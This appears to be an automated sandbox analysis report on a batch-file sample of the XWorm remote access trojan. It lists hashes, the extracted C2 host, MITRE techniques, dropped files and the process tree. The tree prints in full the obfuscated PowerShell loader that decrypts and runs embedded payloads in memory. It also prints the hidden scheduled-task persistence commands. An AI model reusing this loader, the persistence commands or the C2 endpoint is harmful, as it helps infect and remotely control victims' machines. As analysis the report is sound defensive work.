Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-06-2024 16:06

General

  • Target

    XClient.bat

  • Size

    401KB

  • MD5

    ba91ec16f05697b52c5d28f1a250ec71

  • SHA1

    02f0502d5270493a302e28c1df808bb29873c109

  • SHA256

    886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d

  • SHA512

    5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b

  • SSDEEP

    12288:XsxR4y6qFoRRh8jDi8gZKLyJ3ToFQBpJ7W5x7B:XN9qFoRRCLmNBLsn

Malware Config

Extracted

Family

xworm

C2

paris-itself.gl.at.ply.gg:49485

Attributes
  • Install_directory

    %Public%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\System32\mousocoreworker.exe
      C:\Windows\System32\mousocoreworker.exe -Embedding
      2⤵
        PID:2792
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
        2⤵
          PID:3440
        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
          2⤵
            PID:3528
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k RPCSS -p
          1⤵
            PID:904
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:948
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:404
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:944
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1068
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1076
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                      1⤵
                        PID:1100
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1148
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1220
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                            • Drops file in System32 directory
                            PID:1292
                            • C:\Users\Public\svchost
                              C:\Users\Public\svchost
                              2⤵
                              • Executes dropped EXE
                              PID:688
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                            1⤵
                              PID:1356
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1400
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1420
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1428
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                    1⤵
                                      PID:1484
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                      1⤵
                                        PID:1568
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1604
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1648
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1728
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1808
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                1⤵
                                                  PID:1832
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                  1⤵
                                                    PID:1920
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1936
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1972
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:2000
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                          1⤵
                                                            PID:2068
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2108
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2280
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                1⤵
                                                                  PID:2304
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2384
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2392
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2472
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2580
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2600
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2624
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2944
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:2016
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3356
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                    PID:3444
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:6044
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                        3⤵
                                                                                          PID:4240
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                          3⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1108
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_38_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3044
                                                                                          • C:\Windows\System32\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.vbs"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4092
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.bat" "
                                                                                              5⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:5636
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YnSWh2kl5il3EMjntzhV8DXjrMsXq1qvsxGC5bVHd4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OdoCVEiT8kRX1L6TbGv11A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zTNzi=New-Object System.IO.MemoryStream(,$param_var); $hXjuc=New-Object System.IO.MemoryStream; $naMQO=New-Object System.IO.Compression.GZipStream($zTNzi, [IO.Compression.CompressionMode]::Decompress); $naMQO.CopyTo($hXjuc); $naMQO.Dispose(); $zTNzi.Dispose(); $hXjuc.Dispose(); $hXjuc.ToArray();}function execute_function($param_var,$param2_var){ $plvam=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kLZRH=$plvam.EntryPoint; $kLZRH.Invoke($null, $param2_var);}$ZnpwU = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.bat';$host.UI.RawUI.WindowTitle = $ZnpwU;$zIJcx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ZnpwU).Split([Environment]::NewLine);foreach ($vIuJs in $zIJcx) { if ($vIuJs.StartsWith('KSgXqCUIyvjlHChvQmvc')) { $FzXsd=$vIuJs.Substring(20); break; }}$payloads_var=[string[]]$FzXsd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                6⤵
                                                                                                  PID:864
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                  6⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops startup file
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:5076
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost"
                                                                                                    7⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:4008
                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                    "C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"
                                                                                                    7⤵
                                                                                                      PID:552
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6C90.tmp.bat""
                                                                                                      7⤵
                                                                                                        PID:4288
                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                          timeout 3
                                                                                                          8⤵
                                                                                                          • Delays execution with timeout.exe
                                                                                                          PID:4120
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3568
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                              1⤵
                                                                                                PID:4036
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2212
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:5776
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                  1⤵
                                                                                                    PID:5948
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                    1⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:920
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                    1⤵
                                                                                                      PID:2196
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                      1⤵
                                                                                                        PID:1712

                                                                                                      Network

                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                      Execution

                                                                                                      Command and Scripting Interpreter

                                                                                                      1
                                                                                                      T1059

                                                                                                      PowerShell

                                                                                                      1
                                                                                                      T1059.001

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053.005

                                                                                                      Persistence

                                                                                                      Boot or Logon Autostart Execution

                                                                                                      1
                                                                                                      T1547

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1547.001

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053.005

                                                                                                      Privilege Escalation

                                                                                                      Boot or Logon Autostart Execution

                                                                                                      1
                                                                                                      T1547

                                                                                                      Registry Run Keys / Startup Folder

                                                                                                      1
                                                                                                      T1547.001

                                                                                                      Scheduled Task/Job

                                                                                                      1
                                                                                                      T1053

                                                                                                      Scheduled Task

                                                                                                      1
                                                                                                      T1053.005

                                                                                                      Defense Evasion

                                                                                                      Modify Registry

                                                                                                      1
                                                                                                      T1112

                                                                                                      Discovery

                                                                                                      Query Registry

                                                                                                      2
                                                                                                      T1012

                                                                                                      System Information Discovery

                                                                                                      2
                                                                                                      T1082

                                                                                                      Replay Monitor

                                                                                                      Loading Replay Monitor...

                                                                                                      Downloads

                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                        Filesize

                                                                                                        3KB

                                                                                                        MD5

                                                                                                        661739d384d9dfd807a089721202900b

                                                                                                        SHA1

                                                                                                        5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                        SHA256

                                                                                                        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                        SHA512

                                                                                                        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                        Filesize

                                                                                                        53KB

                                                                                                        MD5

                                                                                                        a26df49623eff12a70a93f649776dab7

                                                                                                        SHA1

                                                                                                        efb53bd0df3ac34bd119adf8788127ad57e53803

                                                                                                        SHA256

                                                                                                        4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                                                                                                        SHA512

                                                                                                        e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        005bc2ef5a9d890fb2297be6a36f01c2

                                                                                                        SHA1

                                                                                                        0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                                                                        SHA256

                                                                                                        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                                                                        SHA512

                                                                                                        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oowbffsx.dlr.ps1
                                                                                                        Filesize

                                                                                                        60B

                                                                                                        MD5

                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                        SHA1

                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                        SHA256

                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                        SHA512

                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmp6C90.tmp.bat
                                                                                                        Filesize

                                                                                                        171B

                                                                                                        MD5

                                                                                                        e342403d62d67f42c49c27f501db2268

                                                                                                        SHA1

                                                                                                        11a81183176f35ff17278b6ee7d80a745bf2b3e2

                                                                                                        SHA256

                                                                                                        6cb1a1eb01550a75c2caa43937f3400876dbe65ff23509e11259997cbf24a218

                                                                                                        SHA512

                                                                                                        f0f684b2e1b69f04c6de8ff51901a367114ca6780d71a4fa53048343499673bab02c8f765e340e7f7f4a2f169ba37085a01702b166408a6bcc4b394ca243f4e6

                                                                                                      • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.bat
                                                                                                        Filesize

                                                                                                        401KB

                                                                                                        MD5

                                                                                                        ba91ec16f05697b52c5d28f1a250ec71

                                                                                                        SHA1

                                                                                                        02f0502d5270493a302e28c1df808bb29873c109

                                                                                                        SHA256

                                                                                                        886383676ce8cadc259cadd4de3ba03106f012e5084c739d2fdb826b7c2c4c8d

                                                                                                        SHA512

                                                                                                        5b43f4f65559ac9368e6f574e3231fdeff1c81e185a28c44d9e4151fe146298ce2949edf0e1b64724e4d00efc2f80f1517548ea6bc7d9558797bc94fe948001b

                                                                                                      • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_38.vbs
                                                                                                        Filesize

                                                                                                        123B

                                                                                                        MD5

                                                                                                        5c27604ae4aa6d92fbe0d644c976880c

                                                                                                        SHA1

                                                                                                        0c06706c90b2d00a47bc63f2dae93cc68da8146f

                                                                                                        SHA256

                                                                                                        c021c6879cc408bb1d7fabaa84a19dc773d8573576805ae1a5cb9d6af98531c8

                                                                                                        SHA512

                                                                                                        3811e3557ecf24efe406be928013ddfb90ffb42c84c4b178e2c91db515332cca3ac918cf8c8778781dccf7a783502e13db678750974370e02b76869f76a3d837

                                                                                                      • C:\Users\Public\svchost
                                                                                                        Filesize

                                                                                                        442KB

                                                                                                        MD5

                                                                                                        04029e121a0cfa5991749937dd22a1d9

                                                                                                        SHA1

                                                                                                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                        SHA256

                                                                                                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                        SHA512

                                                                                                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                        SHA1

                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                        SHA256

                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                        SHA512

                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        f313c5b4f95605026428425586317353

                                                                                                        SHA1

                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                        SHA256

                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                        SHA512

                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                        SHA1

                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                        SHA256

                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                        SHA512

                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                        SHA1

                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                        SHA256

                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                        SHA512

                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                        SHA1

                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                        SHA256

                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                        SHA512

                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                        Filesize

                                                                                                        2KB

                                                                                                        MD5

                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                        SHA1

                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                        SHA256

                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                        SHA512

                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                      • memory/944-104-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/948-103-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

                                                                                                      • memory/1076-102-0x00007FFA4FF10000-0x00007FFA4FF20000-memory.dmp
                                                                                                        Filesize

                                                                                                        64KB

